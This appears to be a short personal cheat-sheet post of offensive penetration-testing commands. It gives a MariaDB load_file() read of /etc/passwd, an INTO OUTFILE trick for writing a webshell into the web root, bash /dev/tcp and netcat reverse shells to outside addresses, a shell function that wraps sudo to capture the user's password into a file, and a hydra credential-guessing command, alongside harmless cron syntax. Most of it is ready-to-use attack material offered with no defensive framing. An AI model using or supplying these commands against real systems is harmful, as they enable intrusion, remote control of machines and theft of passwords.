Useful things

19 Jul, 2023

General

when we have enough privileges in mariadb we can use the function load_file() to read files that we are interested in. Example: select load_file("/etc/passwd");

SELECT ... INTO OUTFILE to write a file. Example: select "<?php phpinfo() ?>" into outfile "/var/www/html/shell.php"; we can put some webshell instead of phpinfo().

Simple Bash Shell: bash -i >& /dev/tcp/1.2.3.4/4321 0>&1

Netcat Shell: nc 192.168.6.1 1234 -e /bin/bash

To steal sudo password

function sudo () {
    realsudo="$(which sudo)"
    read -s -p "[sudo] password for $USER: " inputPasswd
    printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt
    $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1
    $realsudo "${@:1}"
}

Cron time string

30 * * * * Execute a command at 30 minutes past the hour, every hour.
0 13 * * 1 Execute a command at 1:00 p.m. UTC every Monday.
*/5 * * * * Execute a command every five minutes.
0 */2 * * * Execute a command every second hour, on the hour.

hydra

When we have wordlist like:

admin:admin
admin:password
...

We have to use -C in hydra. Example: hydra -C wordlist.txt ftp://<vuln_ip>